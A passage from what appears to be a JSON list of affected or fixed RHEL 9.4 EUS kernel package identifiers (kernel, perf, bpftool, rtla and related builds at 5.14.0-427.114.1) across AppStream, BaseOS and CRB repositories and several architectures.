"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
